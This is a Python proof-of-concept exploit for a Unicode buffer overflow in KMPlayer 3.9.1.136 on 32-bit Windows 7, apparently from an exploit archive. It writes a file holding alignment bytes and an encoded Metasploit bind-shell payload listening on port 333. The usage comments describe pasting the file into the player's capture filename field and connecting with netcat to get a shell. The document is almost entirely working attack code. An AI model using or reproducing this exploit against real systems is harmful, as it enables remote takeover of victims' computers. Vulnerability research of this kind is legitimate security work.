#!/usr/bin/python
#
# KMPlayer 3.9.1.136 Capture Unicode Buffer Overflow (ASLR Bypass)
#
# Author: Naser Farhadi
#
# Date: 21 June 2015 # Version: 3.9.1.136 # Tested on: Windows 7 SP1 (32 bit)
#
# Usage:
#       chmod +x KMPlayer.py
#       python KMPlayer.py
#       Alt+c | Video Capture | Alt+a | Audio Capture
#		paste content of KMPlayer.txt into Filename
#       nc 172.20.10.14 333
#
# Video: http://youtu.be/9gtZxR2ioTM
##

buffer = (
            "\x50"  # PUSH EAX
            "\x40"  # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
            "\x5c"  # POP ESP
            "\x40"  # Venetian Padding => ADD BYTE PTR DS:[EAX],AL
            "\x61"  # POPAD
            "\x45"  # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
            ""+("\x5f\x45" * 125)+""  # (POP EDI/Venetian Padding => ADD BYTE PTR SS:[EBP],AL)*125
            "\x54"  # PUSH ESP
            "\x45"  # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
            "\x45"  # Padding => INC EBP
            "\x45"  # Venetian Padding => ADD BYTE PTR SS:[EBP],AL
            "\x61"  # POPAD
            "\x47"  # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
            "\x33\x77"  # POP EBP/RETN from KMPlayer.exe
            "\x58"  # POP EAX
            "\x47"  # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
            "\x33\x77"  # POP EBP/RETN from KMPlayer.exe
            "\x58"  # POP EAX
            "\x47"  # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
            "\x33\x77"  # POP EBP/RETN from KMPlayer.exe
            "\x5d"  # POP EBP
            "\x47"  # Venetian Padding => ADD BYTE PTR DS:[EDI],AL
            "\x71"  # Padding => JNO SHORT 0x2
            "\x71"  # Venetian Padding => ADD BYTE PTR DS:[ECX],DH
         )

# msfpayload windows/shell_bind_tcp LPORT=333 R|msfencode -e x86/unicode_mixed BufferRegister=ESP -t c
shellcode = ("\x54\x47\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
             "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
             "\x49\x41\x6a\x58\x41\x51\x41\x44\x41\x5a\x41\x42\x41\x52\x41"
             "\x4c\x41\x59\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
             "\x41\x41\x41\x5a\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49"
             "\x41\x49\x41\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49"
             "\x41\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41\x5a"
             "\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41\x47\x42\x39"
             "\x75\x34\x4a\x42\x69\x6c\x39\x58\x31\x72\x79\x70\x4d\x30\x39"
             "\x70\x53\x30\x75\x39\x67\x75\x4e\x51\x35\x70\x62\x44\x52\x6b"
             "\x70\x50\x6e\x50\x52\x6b\x52\x32\x4c\x4c\x54\x4b\x72\x32\x4b"
             "\x64\x42\x6b\x52\x52\x4d\x58\x5a\x6f\x38\x37\x6f\x5a\x6c\x66"
             "\x4c\x71\x59\x6f\x36\x4c\x4d\x6c\x30\x61\x51\x6c\x4a\x62\x6c"
             "\x6c\x6f\x30\x69\x31\x78\x4f\x4a\x6d\x59\x71\x77\x57\x67\x72"
             "\x4b\x42\x70\x52\x6e\x77\x62\x6b\x6e\x72\x6a\x70\x32\x6b\x6e"
             "\x6a\x6d\x6c\x74\x4b\x30\x4c\x5a\x71\x32\x58\x49\x53\x70\x48"
             "\x6d\x31\x57\x61\x4e\x71\x44\x4b\x61\x49\x6d\x50\x6a\x61\x4a"
             "\x33\x72\x6b\x71\x39\x6e\x38\x58\x63\x6d\x6a\x70\x49\x62\x6b"
             "\x6c\x74\x74\x4b\x4d\x31\x58\x56\x4d\x61\x69\x6f\x54\x6c\x76"
             "\x61\x78\x4f\x7a\x6d\x69\x71\x47\x57\x4f\x48\x57\x70\x43\x45"
             "\x58\x76\x5a\x63\x61\x6d\x59\x68\x6f\x4b\x61\x6d\x6c\x64\x33"
             "\x45\x57\x74\x30\x58\x54\x4b\x30\x58\x6d\x54\x69\x71\x37\x63"
             "\x70\x66\x44\x4b\x4c\x4c\x70\x4b\x34\x4b\x6f\x68\x4d\x4c\x59"
             "\x71\x68\x53\x64\x4b\x6c\x44\x44\x4b\x5a\x61\x78\x50\x73\x59"
             "\x51\x34\x6c\x64\x6e\x44\x61\x4b\x4f\x6b\x43\x31\x4f\x69\x31"
             "\x4a\x70\x51\x49\x6f\x49\x50\x71\x4f\x61\x4f\x70\x5a\x72\x6b"
             "\x6c\x52\x48\x6b\x64\x4d\x51\x4d\x72\x48\x6c\x73\x70\x32\x49"
             "\x70\x49\x70\x33\x38\x43\x47\x52\x53\x4d\x62\x71\x4f\x4e\x74"
             "\x70\x68\x50\x4c\x44\x37\x6c\x66\x6c\x47\x39\x6f\x47\x65\x37"
             "\x48\x42\x70\x6a\x61\x4d\x30\x39\x70\x4d\x59\x37\x54\x42\x34"
             "\x30\x50\x33\x38\x4b\x79\x35\x30\x42\x4b\x59\x70\x4b\x4f\x46"
             "\x75\x31\x5a\x39\x78\x30\x59\x30\x50\x37\x72\x39\x6d\x31\x30"
             "\x42\x30\x4d\x70\x72\x30\x61\x58\x38\x6a\x4c\x4f\x57\x6f\x77"
             "\x70\x79\x6f\x66\x75\x56\x37\x53\x38\x6b\x52\x39\x70\x79\x71"
             "\x4e\x6d\x61\x79\x67\x76\x62\x4a\x4a\x70\x52\x36\x6e\x77\x51"
             "\x58\x57\x52\x59\x4b\x70\x37\x62\x47\x49\x6f\x38\x55\x72\x37"
             "\x42\x48\x74\x77\x69\x59\x4f\x48\x69\x6f\x69\x6f\x76\x75\x6f"
             "\x67\x63\x38\x52\x54\x5a\x4c\x4f\x4b\x68\x61\x79\x6f\x68\x55"
             "\x31\x47\x46\x37\x62\x48\x54\x35\x72\x4e\x6e\x6d\x50\x61\x69"
             "\x6f\x77\x65\x63\x38\x62\x43\x62\x4d\x42\x44\x6d\x30\x75\x39"
             "\x58\x63\x32\x37\x6e\x77\x50\x57\x50\x31\x6a\x56\x71\x5a\x6e"
             "\x32\x32\x39\x51\x46\x59\x52\x49\x6d\x52\x46\x38\x47\x70\x44"
             "\x4f\x34\x4f\x4c\x4d\x31\x6b\x51\x74\x4d\x6e\x64\x6f\x34\x6c"
             "\x50\x76\x66\x6b\x50\x6e\x64\x51\x44\x32\x30\x50\x56\x71\x46"
             "\x6e\x76\x4f\x56\x70\x56\x50\x4e\x62\x36\x6f\x66\x70\x53\x71"
             "\x46\x51\x58\x54\x39\x46\x6c\x6d\x6f\x31\x76\x4b\x4f\x79\x45"
             "\x34\x49\x59\x50\x50\x4e\x6f\x66\x50\x46\x4b\x4f\x30\x30\x63"
             "\x38\x6c\x48\x54\x47\x6d\x4d\x33\x30\x39\x6f\x66\x75\x75\x6b"
             "\x68\x70\x37\x45\x44\x62\x30\x56\x53\x38\x54\x66\x74\x55\x65"
             "\x6d\x53\x6d\x4b\x4f\x79\x45\x6d\x6c\x59\x76\x43\x4c\x6a\x6a"
             "\x35\x30\x4b\x4b\x59\x50\x70\x75\x6b\x55\x55\x6b\x30\x47\x7a"
             "\x73\x33\x42\x50\x6f\x30\x6a\x59\x70\x32\x33\x6b\x4f\x79\x45"
             "\x41\x41")

buffer += shellcode + "\x71" * (1534 - len(shellcode))

open("KMPlayer.txt", "wb").write(buffer)